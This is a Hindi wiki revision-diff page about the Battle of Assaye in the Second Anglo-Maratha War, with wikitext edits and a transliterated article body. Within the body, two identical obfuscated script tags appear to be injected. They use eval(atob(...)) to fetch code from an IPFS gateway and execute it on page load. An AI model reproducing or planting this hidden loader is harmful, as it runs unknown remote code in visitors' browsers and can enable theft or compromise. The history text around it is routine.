Difference between revisions of "असाई की लड़ाई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:इतिहास कोश (को हटा दिया गया हैं।))
 
(6 intermediate revisions by 5 users not shown)
Line 1: Line 1:
*असाई की लड़ाई दूसरे आंग्ल-मराठा युद्ध (1803-05 ई.) के दौरान हुई।  
+
'''असाई की लड़ाई''' दूसरे [[आंग्ल-मराठा युद्ध]] (1803-05 ई.) के दौरान हुई।  
 
*इस लड़ाई में अंग्रेज़ी सेना ने सर आर्थर वेलेजली के नेतृत्व में शिन्दे और भोंसले की विशाल सेना को [[23 सितम्बर]] 1803 ई. को पराजित कर दिया।  
 
*इस लड़ाई में अंग्रेज़ी सेना ने सर आर्थर वेलेजली के नेतृत्व में शिन्दे और भोंसले की विशाल सेना को [[23 सितम्बर]] 1803 ई. को पराजित कर दिया।  
*शिन्दे की जिस सेना ने लड़ाई में भाग लिया, उसको यूरोपीय अफ़सरों से यूरोपीय ढंग से ट्रेनिंग दिलाई गई थी, लेकिन वह छोटी सी अंग्रेज़ी सेना से बुरी तरह से पराजित हो गई।
+
*शिन्दे की जिस सेना ने लड़ाई में भाग लिया, उसको यूरोपीय अफ़सरों से यूरोपीय ढंग से ट्रेनिंग दिलाई गई थी, लेकिन वह छोटी सी अंग्रेज़ी सेना से बुरी तरह से पराजित हो गई।<ref>पुस्तक 'भारतीय इतिहास कोश' पृष्ठ संख्या-30</ref>
  
{{प्रचार}}
+
 
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
[[Category:इतिहास कोश]]
+
{{भारत के युद्ध}}{{औपनिवेशिक काल}}
 +
[[Category:युद्ध]]
 +
[[Category:भारत के युद्ध]]
 +
[[Category:भारत का इतिहास]]
 +
[[Category:औपनिवेशिक काल]][[Category:अंग्रेज़ी शासन]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:59, 21 February 2013

asaee ki l daee doosare aangl-maratha yuddh (1803-05 ee.) ke dauran huee.

  • is l daee mean aangrezi sena ne sar arthar velejali ke netritv mean shinde aur bhoansale ki vishal sena ko 23 sitambar 1803 ee. ko parajit kar diya.
  • shinde ki jis sena ne l daee mean bhag liya, usako yooropiy afasaroan se yooropiy dhang se treniang dilaee gee thi, lekin vah chhoti si aangrezi sena se buri tarah se parajit ho gee.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak 'bharatiy itihas kosh' prishth sankhya-30

sanbandhit lekh